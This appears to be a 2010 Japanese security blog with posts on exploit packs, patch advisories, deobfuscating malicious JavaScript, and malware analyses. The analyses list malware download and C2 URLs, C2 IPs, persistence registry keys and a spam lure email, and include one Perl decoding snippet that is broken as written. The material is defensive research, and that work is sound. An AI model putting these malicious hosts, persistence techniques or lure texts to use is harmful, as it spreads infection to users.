追加情報： 【サイバー犯罪ツール】PCエクスプロイトをチェックするソフト

※1ヶ月前にここで「PCエクスプロイトをチェックするソフト」のブログ内容を書きました。下記の内容は前回の最新情報アップデートとなります。

1ヶ月前から新しい「exploit pack」ソフトが沢山出てきました。下記の画像一覧の所につい最近流行った「exploit pack」ソフト名とスクリーンショット情報となります。もし詳細情報を調べたい方々はソフト名をグーグルで検索して下さい。

最新発見された「exploit pack」について動き的には前回のバーションと変わりません。良く比べたら違いのは下記となります↓
※最新版exploit packのGUIが使いやすい
　この理由で「Eleonore」exploit packが結構使われてます。
※最新vulnerability exploitDBの対応
　まさしく昨年に出た「exploit pack」ソフトが使えません。
※ロシアで作られた「explot pack」が多いくなりました。

下記　有名な「exploit pack」のソフト名と画像キャップチャーとなります。

1) Justexploit


2) YES / Yes Exploit


3) Liberty


4. NEON

結構聞かれた事ですが→「それぞれのexploit packの攻撃はどんなvulnerability情報が一番よく使われましたか？」SANS ISCのリサーチ結果基づいて回答は下記のランク情報となります↓

- Vuln in NEON Pack. Permanent XSS+XSRF.
- Vuln in NEON Pack. SQL Injection.
- Vuln in YES Pack. Remote File Disclosure.
- Vuln in YES Pack. Permanent XSS+XSRF admin.
- Vuln in YES Pack. Remote SQL Injection.
- Vuln in Lucky Sploit Pack. Remote control.
- Vuln in Liberty Pack. Permanent XSS+XSRF.
- Vuln in Liberty Pack. SQL Injection.
- Vuln in Eleonore Pack. Another SQL Inject.
- Vuln in Eleonore Pack. XSRF in admin panel.
- Vuln in Eleonore Pack. Permanent XSS.
- Vuln in Eleonore Pack. Remote SQL Inject.

次の情報ですが、「それぞれのexploit packはどのぐらいセキュリティダメージの割合が持っていますか？」良く聞かれた質問ですので、TEHTRI-Securityの情報を使い、回答は下記の画像となります↓

Windows OSウェブブラウザーの攻撃割合↓

↑MS IEはやはり一番ターゲットされているブラウザー、IE6の攻撃パターンが一番多いです。

Exploit Pack攻撃ソースの割合↓

↑Eleonore exploit packが一番人気です、説明前回のブログ内容を見て下さい。

ソフトウェア経由の攻撃について、下記の割合となります↓


スキャン結果の検地率割合↓
さらに「exploit pack」ソフトのバイナリーをアンチウイルスやアンチマルウェア製品ソフトにスキャンしたら検知率が低いです、スキャン結果は殆どミスでした↓

credit: TEHTRI Sec, SANS ISC, 0DAY.JP
---
http://0day.jp
マルウェアリサーチチーム
アドリアン・ヘンドリック

最新Adobe Reader/Acrobatのセキュリティパッチ(平成22年6月29日)

今月の約束に当たってAdobe社昨日JSTで下記のReaderとAcrobat (flash player 10.0.45.2 code execution)マルチプルセキュリティ問題対応の為にセキュリティアップデートがリリースしました、詳しくは下記の情報となります↓
CVE情報↓

CVE-2010-1297 :
CVE-2010-1240, CVE-2010-1285, CVE-2010-1295, CVE-2010-1297, CVE-2010-2168, CVE-2010-2201, CVE-2010-2202,
CVE-2010-2203, CVE-2010-2204, CVE-2010-2205, CVE-2010-2206, CVE-2010-2207, CVE-2010-2208, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211, CVE-2010-2212
注意点↓
※もしマルウェアは上記のセキュリティ問題を使われたらウイルス感染可能性が出ますので早めにアップデートをインストールして下さい。
※上記の問題説明の１つ、PDFの｢/Launch｣コマンドのセキュリティが入ってます。パッチアップデートで解決しましたってAdobe社のブログで書いてあります。
※上記のセキュリティ問題情報の再現仕方はインターネットで交換されてます（確認したいならこちらへ見て下さい）、この情報を使われたマルウェアも現在発見しています。アップデートしないPCは｢ゼロデイ｣でマルウェアに感染される可能性が非常に高いです。

新バーション版は9.3.3となります、メーカーからのセキュリティブレチン説明は詳細説明が書いておりアクセスは下記のURLとなります↓
http://www.adobe.com/support/security/bulletins/apsb10-15.html

詳細情報については下記Adobe社のブログに書いてありますがご確認下さい↓
http://blogs.adobe.com/adobereader/2010/06/adobe_reader_and_acrobat_933_a.html

---
http://0day.jp
セキュリティチーム

マルウェアJavaScriptについて（その４）

※本件のブログ内容は「マルウェアJavaScriptについて」その１、その２とその３のつづきです。

今回のマルウェアJavaScript内容は「見難い」コードを確認する方法の説明です。「見難い」の単語は理解の為に使いましたが、英語ですとobfuscated codeといいます。

マルウェアjavascriptコードは殆どWindows OSのjavaエンジンで動かす目的である、windowsでは全てjavascriptの変換関係のプロセスはjava.dllライブラリーの中にオブジェクトが入っています。

詰り、「java.dll」の「COlescript::Compile()」は「javascriptのeval()」のコマンドと同じ動きです。もっと言うと…ブラウザーで「見難い」javascriptマルウェアコードを動かしたら、「見難い」javascriptをjava.dllをコールし、java.dllの「COlescript::Compile()」で「見難い」javascriptコードを「見やすい」javascriptコードになってから実行されます。

そう言う意味では全てjava.dllの「COlescript::Compile()」の出した結果を確認すれば良いかと思われます。結果はその通りです。このインターセプト方法は可能になります。インターセプトに仕方は下記のスクリーンショットに書いたコードになります↓

※上記の画像をクロックしたら大きく見えます。

↑この経由でjavascriptマルウェアの見難いコードを確実に確認が出来ます。

つづき
---
http://0day.jp
マルウェアリサーチチーム
アドリアン・ヘンドリック

Re: 「HTTPS Everywhere」Googleセキュアブラウザーサービス

本件のブログ内容は前回の内容の内容つづきとなります。

先日Google社はHTTPS検索サービスがやり始めました。HTTPSを使い検索元のURLは「https://www.google.com」でしたのでサービスが順調に動いております（英語版のですね）。つい最近教育側HTTPSを扱い仕組みに当たって、HTTPS元のURLの問題があり、google社は元HTTPSのURLを変更しました→「https://encrypted.google.com/」になります。問題の説明はこちらへ確認が出来ます（英語で申し訳御座いません）

とういう意味では暗号されたプロトコルでウェブ検索したいの方々の為にこの情報が必要です。
----
http://0day.jp
セキュリティーチーム

【zeroday】Sun Solaris 10 x86とsparcのパッチアップデートミス

本件セキュリティ問題について下記のUNIX OSに影響があります↓

Solaris 10 (x86) 、Solaris 10 (sparc)

問題の説明は下記となります。

remote hostには「Sun Security Patch number 124630-42」が見つからない状況でアップデートされなかった。パッチは実は「Jun/28/10」にリリースされました。解決方法は手でアップデートが必要です。下記　念のために英語の説明をコピーしました↓
Synopsis :
The remote host is missing Sun Security Patch number 124630-42
Description :
SunOS 5.10: System Administration Applications, Network, and Core.

リファレンス↓

http://sunsolve.sun.com/search/document.do?assetkey=1-21-124631-42-1
http://www.nessus.org/plugins/index.php?view=single&id=47157
http://www.nessus.org/plugins/index.php?view=single&id=47156

----
株式会社ケイエルジェイテック
http://www.kljtech.com
セキュリティモニターセンター

VMware ESX 3.5 サービスコンソールのカーネルアップデート(VMSA-2010-0010)

本件セキュリティ問題について下記のOSに影響があります↓

ESX Console OS (COS)

追加情報↓

Advisory ID: VMSA-2010-0010
Synopsis: ESX 3.5 third party update for Service Console kernel
Issue date: 2010-06-24
Updated on: 2010-06-24 (initial release of advisory)
CVE numbers: CVE-2008-5029 CVE-2008-5300 CVE-2009-1337
CVE-2009-1385 CVE-2009-1895 CVE-2009-2848
CVE-2009-3002 CVE-2009-3547 CVE-2009-2698
CVE-2009-2692

問題の説明↓

CVE-2008-5029 CVE-2008-5300 CVE-2009-1337 CVE-2009-1385 CVE-2009-1895 CVE-2009-2848 CVE-2009-3002 CVE-2009-3547 CVE-2009-2698 と CVE-2009-2692のセキュリティ問題のアップデートに当たってESX 3.5 Console OS (COS)のカーネルパッケージをリリースされました。本件のアップデートについてバーションESX 3.5版用のアップデートになり　本件のアップデートは前のバーションに対応しておりませんのでESX 3.5 Console OS (COS)にアップグレードが必要です。

解決方法↓

下記のURLでアップデートの確認とダウンロードが出来ます。
http://download3.vmware.com/software/vi/ESX350-201006401-SG.zip
md5sum: b89fb8a51c4a896bc0bf297b57645d1d
http://kb.vmware.com/kb/1022899
アップデートに対して下記の条件をご確認が必要です↓
VirtualCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.0 ESX not applicable
ESX 3.5 ESX ESX350-201006401-SG
ESX 3.0.3 ESX affected, no update planned
vMA 4.0 RHEL5 not applicable
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.

リファレンス↓

http://www.securityfocus.com/archive/1/512019
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5029
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5300
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1337
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1385
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1895
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2848
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3002
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2698
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692

VMware Security Center
http://www.vmware.com/security

VMware security response policy
http://www.vmware.com/support/policies/security_response.html

General support life cycle policy
http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html

---

株式会社ケイエルジェイテック
http://www.kljtech.com
セキュリティモニターセンター

拡張子設定リファレンス

メールやウェブフィルターの数多くある機能の一つは拡張子フィルターといいます。
どの拡張子を設定した方がいいのかポリシー判断になり、その為に現状のマルウェアを使われている拡張子情報が必要です。
5月のインターネットで発見されたマルウェア情報を様々なウェブフィルターとメールフィルター製品から頂き、下記情報の概要となります。
まずは「*.exe, *.scr, *.vbs, *.js, *.txt, *.php, *.jpg, *.dll, *.pdf, *.gif と *.com」マルウェアを使っている拡張子が一番多いです。ここの中にPDF拡張子マルウェアは１．２％の割合になりました（殆どjavascriptマルウェア種類で、トロイredirectorとトロイ・ダウンローダーです）
2番目は拡張子無しの発見されたマルウェアファイルです。
先月の情報と比べたら、それぞれの形式マルウェア数が上がりました。PDF拡張子マルウェアは52.14%上がりました、cmd拡張子マルウェアは 66.67%、ocxは56.25%、swf拡張子マルウェアは43.30%に上がってしまいました。

source: K-PROXウェブ・フィルター、GData
---
http://0day.jp
マルウェアリサーチチーム

InterScan Virtual Applianceのマルチプルセキュリティ問題

本件のセキュリティ問題について下記の製品に影響があります↓

Trend Micro InterScan Web Security Virtual Appliance 0

問題情報は↓

Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Jun 14 2010 12:00AM
Updated: Jun 23 2010 03:38PM
Credit: Ivan Huertas

説明↓

Trend Micro InterScan Web Security Virtual Applianceのマルチプルセキュリティ問題があり、リモートからファイルのダウンロードとアップロード攻撃作成可能性が高いです。

再現方法↓

* /data/vulnerabilities/exploits/41072-upload.txt
* /data/vulnerabilities/exploits/41072-download.txt

解決方法（パッチ情報）↓

http://www.trendmicro.com/ftp/documentation/readme/iwsva_50_ar64_en_cp1386_readme.txt

リファレンス↓

http://archives.neohapsis.com/archives/fulldisclosure/2010-06/0506.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-06/0507.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-06/0508.html

---
http://0day.jp
セキュリティチーム

iPhoneとiPodマルチプルセキュリティ問題（まとめて）

下記のセキュリティ問題についてiPhoneとiPodのiOSに影響があり(iOS 4には影響がありません)、ご確認下さい。本件問題に当たってApple社よりアップデートがリリースされましたが、それぞれの問題リファレンスURLに情報をご確認下さい。

---

Apple iPhone and iPod touch Application Sandbox User Photo Library Security Bypass Vulnerability
Apple iPhone/iPod touch Prior to iOS 4 Wireless Network Security Weakness
Apple iPhone/iPod touch Prior to iOS 4 URI Stack Based Buffer Overflow Vulnerability
WebKit 'history.replaceState' Cross-Origin Information Disclosure Vulnerability
Apple iPhone/iPod touch Prior to iOS 4 JPEG File Buffer Overflow Vulnerability
WebKit 'JavaScriptCore' Page Transition Remote Code Execution Vulnerability
WebKit Table Handling Remote Code Execution Vulnerability
Apple iPhone/iPod touch Prior to iOS 4 Safari Security Bypass Vulnerability
Apple iPhone and iPod touch Race Condition Security Bypass Vulnerability
Apple iPhone/iPod touch Prior to iOS 4 Passcode Lock Authentication Bypass Vulnerability
WebKit User Interface Cross Domain Spoofing Vulnerability

---

unixfreaxjp

マルウェアJavaScriptについて（その３）

※本件のブログ内容は「マルウェアJavaScriptについて」その１とその２のつづきです。
今回本格的な話ですが、つい最近、6月19日から沢山JavaScriptマルウェアメールを発見されました。6月20日と21日にJavaScriptマルウェアメールの数はピーク状態になります。殆ど20日から様々なマルウェア対策メールフィルターソフト製品は対応が出来て22日から段々と下がります。

上記はK-SHIELDメールフィルターアプライアンスの６月中のウイルスレポート結果ですが、二つ種類JavaScriptマルウェアが流行りましたと確認が出来ます。
1) 「Redirector」JavaScriptマルウェア
(Trojan.JS.Redirector/TROJ_JSREDIR/JS_REDIR/Trojan:JS/Redirector)
2) ダウンローダーJavaScriptマルウェア
（Trojan-Dropper / Trojan-Downloader.JS /「JS/Dldr.xxx」)

下記詳細なサンプル調査説明になります↓

---

１）「Redirector」JavaScriptマルウェア

---

最近メールトラフィックの中に一番沢山発見されたのはRedirectorのjavascriptマルウェアです。本件の新種類はトロイの機能も持っているので「Trojan.JS.Redirector.dz」 (Kaspersky経由のウイルス名)」のマルウェア名になった。見つけたサンプルファイルを他のマルウェア対策メーカー製品に確認(スキャン)したら色んなマルウェア名の結果が出てきました↓
・Trojan-Dropper [Ikarus]
・Mal/Generic-L [Sophos]
・Email-Worm.Ackantta [PCTools]
・など
本件のjavascriptマルウェアはhtml/pdfファイルをメールに添付されております。目的はファイルを開くとjavascriptを起動されて、他のページに転送すると。javascriptマルウェアの転送先サイトはまた別のマルウェアが発見されましたので、確認が出来ましたのは下記のマルウェアページです↓
・Trojan-Dropper.Microjoiner
・Trojan-Spy.Zbot.YETH
・Mal/CryptBox-ｘｘｘ [Sophos]
・Trojan-Dropper [Ikarus]
上記のマルウェアサイトのサンプルを調査したら結果は「SPAM－BOT」ですが、詳細なレポートは下記のように↓

* Submission received: 18 June 2010, 00:58:24
* Processing time: 7 min 9 sec
* Submitted sample:
o File MD5: 0x4BDA705961BD17C68C879AE99F6CD955
o File SHA-1: 0x512BC716C186F67E8541A253CD256604ABA849AF
o Filesize: 441,856 bytes
---動き方----
Produces outbound traffic.
Communication with a remote SMTP server and sending out email.
Creates a startup registry entry.
Contains characteristics of an identified security risk.
---マルウェア種類------
A malicious trojan horse or bot that may represent security risk for the compromised system and/or its network environment
----感染されるファイル情報-----
%AppData%\SystemProc
%ProgramFiles%\Mozilla Firefox
%ProgramFiles%\Mozilla Firefox\extensions
%ProgramFiles%\Mozilla Firefox\extensions\{9CE11043-9A15-4207-A565-0C94C42D590D}
%ProgramFiles%\Mozilla Firefox\extensions\{9CE11043-9A15-4207-A565-0C94C42D590D}\chrome
%ProgramFiles%\Mozilla Firefox\extensions\{9CE11043-9A15-4207-A565-0C94C42D590D}\chrome\content
----ネットワーク動き情報------
Remote Host Port Number
facebookmail.com 25
136.248.126.131 25
216.32.180.22 25
-----パケットキャップチャー情報------
00000000 | 4548 4C4F 2068 616C 6C6D 6172 6B2E 636F | EHLO hallmark.co
00000010 | 6D0D 0A45 484C 4F20 7477 6974 7465 722E | m..EHLO twitter.
00000020 | 636F 6D0D 0A | com..
------以上--------

---

2) ダウンローダーJavaScriptマルウェア

---

本件のJavaScriptが結構昨年から見つかりました。6月20日から２つ種類が良く流行っています「Trojan-Downloader.JS.Pegel.g」と「Trojan-Downloader.JS.Pegel.bc」です。「Trojan-Downloader.JS.Pegel.g」を詳しく説明します。このウイルス名はkaspersky経由のウイルス名ですが、他のウイルス対策ベンダーの名前は下記となります。

Troj/JSRedir-AU (Sophos)
Troj/JSRedir-AR (Sophos)
JS.Redirector.based.2 (DrWeb)
JS.Redirector.based.1 (DrWeb)
JS/TrojanDownloader.Agent.NSA trojan (Nod32)
JS.Redirector.Gen (VirusBuster)
JS:Illredir-U [Trj] (AVAST)
JS:Illredir-Y [Trj] (AVAST)
JS:Illredir-N [Trj] (AVAST)
JS:Illredir-K [Trj] (AVAST)
JS/Pegel.f.4343 (AVIRA)
Trojan-Downloader.JS.Pegel.g [AVP] (FSecure)
JS_ONLOAD.SMC (TrendMicro)
JS_ONLOAD.SMD (TrendMicro)
Trojan.JS.Redirector.bg (v) (Sunbelt)
JS.Redirector.Gen (VirusBusterBeta)

本件マルウェアに感染されたHTMLページの見た目は下記のコード・スナップショットです↓

※上記の画像のマルウェアコードは前のサイトから新しいマルウェアページに転送されるとの意味です。

実は本件のトロイダウンローダーjavascriptの感染仕方は二つがあり
１）感染されたホームページのHTMLページにを追加する、この件はウェブアクセスで感染仕組みが動いております。
２）javascriptファイルのダウンロード、これだとメールに添付された仕組みとなります。

どんな形のコードでしょうか？例えば感染されたHTMLを見たら、下記はマルウェアコードのスナップショットです↓

上記のコードの右側を見たら下記のfunctionが書いてあります↓

var Y=F(’89910918991021′,”129″)

「　F()　」の目的はstringの切替の為にです。Perlコードで同じ動きを書くとこんな感じです↓

while (<>){
if (/F\('([a-zA-Z0-9]+)'\s*,\s*"([a-zA-Z0-9]+)"/) {
my $one = $1;
my $two = $2;
$one =~ s/[$two]/g;
print $one . "\n";
} }

それと、上記の「w」のvariableはマルウェアサイトの情報となります。

メールに添付されたjavascriptは殆どボットネットから送ってくれたのケースが多いです。但しマルウェアHTMLページですと盗まれたFTPアカウントからです。

credit: Sophos, Kaspersky, BitDefender, K-SHIELD, ケイエルジェイテック

---
http://0day.jp
マルウェアリサーチ
アドリアン・ヘンドリック

｢Zbot.akoc/Zbot-RD｣Zeus新規トロイ木馬が発見されました

昨日の夜から新しいZeus/Zbotのトロイシリーズがメールトラフィックで沢山発見されました。
サンプルは下記の情報となります↓
ファイル名前｢jso.exe｣と｢js.exe｣
サイズ情報↓
File size: 130649 bytes
MD5...: fe884ef028f05c3210160a5834e86f42
PEInfo: PE Structure information
オリジン↓
hxxp://alsons.ru/pizda/ (ロシア)
（トロイセットはjso.exe, js.exe, config.bin, suki.php）
スキャンしたら結果は下記のウイルス名となります↓
BitDefender 7.2 2010.06.20 ｢Backdoor.Bot.123498｣
Sophos 4.54.0 2010.06.20 ｢Troj/Zbot-RD｣
Kaspersky 7.0.0.125 2010.06.20 ｢Trojan-Spy.Win32.Zbot.akoc｣
TrendMicro 9.120.0.1004 2010.06.20 ｢TSPY_QAKBOT.SMG｣
※現時点ではMcAffee、Symantec、ClamAVのパターンDBには未だ対応されてません。詳しくは

下記のウイルストータル情報↓
http://www.virustotal.com/analisis/f9764556e782fcaa4c48a4d7c986c157d97223f97afa7c3e41382b2ac5c1fe32-1277020639

こちらはVIRSCAN.ORGのスキャン情報です↓
http://virscan.org/report/28978ad08e865152b6860e4e233564fe.html

マルウェア仕組みは未だ途中結果ですが、下記となります↓
このトロイをインストールされたら%System%\jso.exeのプロセスが立ち上がってます。
Registryには下記のレコードを追加されて↓
# HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
* {5388BF2A-F66F-7E95-DE9B-DD584B5968BE} = ""%AppData%\Xeqiy\jso.exe""
↑パソコンのシステムを起動したら、このトロイを実行されてしまいます。
ネットワーク情報ですが、下記のIPとポート番号に繋ぐ動きを確認が出来ました↓
195.206.246.203　80
---
ZeroDay.jp
http://0day.jp
マルウェアリサーチチーム

【マルウェア情報】日本国内のメールに添付されたマルウェアのレポート（5月）

今回日本国内にある２台ハニーサーバからの5月のマルウェアメールの情報がやっと出来上がりました。サーバは関西、関東に用意しました。メールフィルター製品は「K-SHIELD」メールセキュリティフィルターアプライアンスを使っております。
５月のメール通を見たらマルウェアメールは～２．５％となりますが、４月と比べたらパーセンテージが少し下がりましたがメールトラフィック事態に増えて着ましたのでマルウェアメール通的には増えました。
上記の画像を見ながら５月には注意しなきゃ行け無いマルウェア情報は下記の一覧5件となります。以下説明します。さらに「Exploit.Win32.Pidief.dcd」、「Packed.Win32.Katusha.l」、「Trojan-spy.HTML.Fraud.gen」、「Trojan.Win32.FakeAV.xx」のマルウェア情報について先月のブログ内容に説明しました。現在迄情報は変わらないので、こちらへご覧下さい。

---

１）KRAP

Dropper/Malware.52736.AD [AhnLab]
Packed.Win32.Krap.an [Kaspersky Lab]
Mal/EncPk-NS, Mal/FakeAV-BW, Mal/FakeAV-BW [Sophos]
Packed.Win32.Krap [Ikarus]

【background】

本件のマルウェアは偽(Fake)マルウェア警告ソフト/scarewareです。

【マルウェア仕組み】

このマルウェアが入ってしまったら、セキュリティ警告の関係registry情報を追加/変更されてます。目的は詐欺です。先ずはトロイの形でPCに入ってしまいます、このトロイはジェネリック種類トロイですが入ってしまったらセキュリティ警告のバイナリープログラム（scareware）をダウンロードさてます。scarewareをインストールされたら沢山ウイルス感染された警告pop-upウィンドーが出て、ユーザが偽ウイルス対策ソフトのダウンロードページにおすすめされてます。本件のscarewareのファイル形はPE_Patch.UPX形式ファイルです。

【ファイル名】

%System%\41.exe （0byte）
%System%\ES15.exe （0byte）
%System%\helpers32.dll　（0byte）
%System%\smss32.exeと
%System%\winlogon32.exe（合計52,736bytes）
%System%\warnings.html (4,278bytes)

【プロセス名】

smss32.exe %System%\smss32.exe 139,264 bytes
↑若しくは↓
winlogon32.exe %System%\winlogon32.exe 139,264 bytes

【registry】

下記のregistry情報を追加されます↓
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\buy-security-essentials.com
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\get-key-se10.com
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ActiveDesktop
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
o HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter
o HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\buy-security-essentials.com
o HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\download-soft-package.com
o HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\download-software-package.com
o HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\get-key-se10.com
o HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\is-software-download.com
o HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
o HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

悪戯設定は2件があり↓
※TaskManagerを起動が出来ないように下記のregistryバリューを変更された↓
o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
+ DisableTaskMgr = 0x00000001
※それで、OS起動の時にsmss32.exe も起動する形になります↓
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ smss32.exe = "%System%\smss32.exe"

【サンプルスキャンリファレンス】

http://www.virustotal.com/analisis/1b327d7a06de60817c89e9a68f9bbe3c456bb4ab08aae55189989edfe8c598ad-1276797587
http://www.virustotal.com/analisis/8d472da68530c61aa8a5c87aecc26b100eb1ba81a6c3137a5c7fab2e819f0017-1276977396

---

２）VBKRYPT

Trojan.Sasfis [PCTools]
Trojan.Sasfis [Symantec]
Trojan.Win32.VBKrypt.xx [Kaspersky Lab]
Troj/Bredo-CZ [Sophos]
Trojan:Win32/Meredrop [Microsoft]
Win-Trojan/Vbcrypt.34816 [AhnLab]

【background】

本件のマルウェアはMicrosoftOfficeVBコードのベースのトロイです。
ソースIPを見たら全て１００％ロシアからのメールルートです。

【マルウェア仕組み】

Trojan.Win32.VBKrypt.xxx又はTrojan.Sasfisは海外文書のスパムメールに結構添付されております。
添付されたファイルの形は「Contract.zip」のZIPファイルですのでアーカイブの中にはマルウェアファイル「contract___doc____.exe」が入ってます。スパムメール文書のサンプルは下記となります↓↓
ーーーーーここからーーーーー
Dear ladies and gentlemen,
We have prepared a contract and added the paragraphs that you wanted to see in it.
Our lawyers made alterations on the last page. If you agree with all the provisions we are ready to make the payment on Friday for the first consignment.
We are enclosing the file with the prepared contract.
If necessary, we can send it by fax.
Looking forward to your decision.
"Young Lockett
ーーーーここまでーーーーーーー
もし添付されたEXEファイルをクリックしてしまうとシステムにマルウェアファイルをコピーされてWindowsのregistryを変更されて次の起動する時にこのマルウェアを起動されます。
起動されたらインターネットから色々マルウェアファイルをダウンロードされます（詰り：VirTool:Win32/VBInject.FO, Win32/Oficla.GN, Trj/Downloader.XOV, Mal/Koobface-E, Trojan.Sasfis）

【ファイル名】

%Temp%\1.tmp （ワードファイルですが、このファイルをクリックしてしまうと感染仕組みが始めます)
%System%\dllcache\ndis.sys（これはトロイのバイナリー）

【process情報】

svchost.exe %System%\svchost.exe 5,124,096 bytes

【registry】

下記のregistryを追加されます↓
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\idid
* url1 = 68 74 74 70 3A 2F 2F 6C 65 65 69 74 70 6F 62 62 6F 64 2E 72 75 2F 69 6D 61 67 65 2F 62 62 2E 70 68 70 00 52 51 91 7C A0 10 08 00 08 00 15 C0 78 E8 07 00 C0 1F 1A 00 FC 1F 1A 00 50 E8 07 00 7D 5D 91 7C B0 1F 1A 00 40 CE 97 7C B4 5D 91 7C 42 CE 97 7C 4
* url2 = 68 74 74 70 3A 2F 2F 6C 6F 6C 6F 6F 68 75 69 6C 64 69 66 73 64 2E 72 75 2F 69 6D 61 67 65 2F 62 62 2E 70 68 70 00 02 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 2C 03 00 00 D8 E6 07 00 F1 5A 91 7C 03 00 00 01 00 00 00 00 A0 10 08 00 9C E6 07 00 38 E
* url3 = 68 74 74 70 3A 2F 2F 6E 65 6D 6F 68 75 69 6C 64 69 66 73 64 2E 72 75 2F 69 6D 61 67 65 2F 62 62 2E 70 68 70 00 00 00 00 00 78 E7 07 00 CC E6 07 00 AC E6 07 00 A4 67 91 7C 04 E7 07 00 00 00 00 00 18 00 1A 00 1C E8 07 00 74 C1 97 7C 00 00 00 00 DC E6 0
* url4 = 00 E7 07 00 40 E8 07 00 00 5A 91 7C 2C E7 07 00 00 00 00 00 1C E9 07 00 65 5A 91 7C 5C E9 07 00 74 C1 97 7C 00 00 00 00 00 00 00 00 6C E9 07 00 80 E8 07 00 00 00 00 00 E0 E8 07 00 00 00 00 00 00 00 00 00 B8 2E 0A 00 84 E7 07 00 22 02 FB 7F 00 01 00 0
HKEY_LOCAL_MACHINE\SOFTWARE\AGProtect

【ネットワーク】

Windows registryに書いたURLに繋ぎますので下記のIPとポート番号となります↓
193.105.174.108 80
59.53.91.195 80
67.215.250.146 80
199.239.254.18 25
204.93.169.124 25
209.85.227.27 25
213.205.33.247 25
62.211.72.32 25
64.34.180.29 25
64.59.134.8 25
65.54.188.72 25
66.94.236.34 25
74.125.148.10 25
212.95.32.15 21131
↑上記のURLを調査したら下記のサイトに繋ぐ状況確認が取りました↓
http://hulejsoops.ru/images/bb.php?v=200&id=653227819&b=build_20&tm=1
http://hulejsoops.ru/images/bb.php?v=200&id=653227819&tid=11&b=build_20&r=1&tm=1
http://www.russianmomds.ru/loader.exe

【サンプル・リファレンス】

http://www.virustotal.com/jp/analisis/3656c10882ac3777ff337303a0e1a9cfa0ba3e140377371ceb6005b33e06e112-1276799606

http://www.virustotal.com/analisis/3656c10882ac3777ff337303a0e1a9cfa0ba3e140377371ceb6005b33e06e112-1276799606

---

３）Zeus/Zbotトロイダウンローダー

Trojan.Gen [Symantec]
Trojan-Downloader.Win32.Agent.dlhe [Kaspersky Lab]
Mal/Generic-L [Sophos]
Win-Trojan/Zbot.26624.C [AhnLab]
Downloader.Generic [PCTools]
Mal/FakeAV-BW, Mal/FakeAV-BW [Sophos]

【background】

基本的にトロイエージェントです。
形的にはメールにPE_Patch.UPX形式で添付されてます。
ソースのIPを見たらこのメールは殆どボットネットネットワークから投げてくれまして、恐らくZeus/Zbotのボットネットです、IPルートを見たらロシアと中国から送ってくれました。

【マルウェア仕組み】

このトロイはユーザーのIEブラウザ組み込んで全てユーザーのインターネット履歴情報と個人情報を取る事は目的です、この目的の為にIEの裏側設定を変更されてます。それともこのトロイにインターネット側からのマルウェアファイルをダウンロードされてます。ダウンロードされた物は殆ど偽(fake)アンチウイルス/アンチマルウェアソフトです。

【ファイル名】

このトロイに感染されたら下記のファイルをWindowsシステムにコピーされております↓
%System%\reader_s.exe
%Temp%\infected\reader_s.exe
%Temp%\windows\system32\reader_s.exe
%UserProfile%\reader_s.exe
※本件マルウェアはPolimorphic機能が持っていますが「reader_s.exe」のファイル名とサイズは変わる可能性が高いです
※「reader_s.exe」の添付ファイルは96%可能性がマルウェアファイルです。

【process情報】

reader_s.exe %System%\reader_s.exe 49,152 bytes
reader_s.exe %UserProfile%\reader_s.exe 49,152 bytes

【registry】

下記の情報をwindows registryに追加されてます、目的はシステムを起動する時にreader.exeのプロセスも起動されます。
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
* reader_s = "%System%\reader_s.exe"
# [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
* reader_s = "%UserProfile%\reader_s.exe"

【ネットワーク】

下記のIPとポート番号に繋ぎます
218.61.7.9 80
61.158.167.59 80
221.230.2.208 80
61.158.167.52 80
60.191.254.235 80
216.245.219.194 80
69.162.86.210 80
69.162.68.250 80
↑下記のIP情報は上記のIDCに向いてます
halyptt.net.cn.（中国）
limestonenetworks.com（USのIDC）

【サンプルスキャンリファレンス】

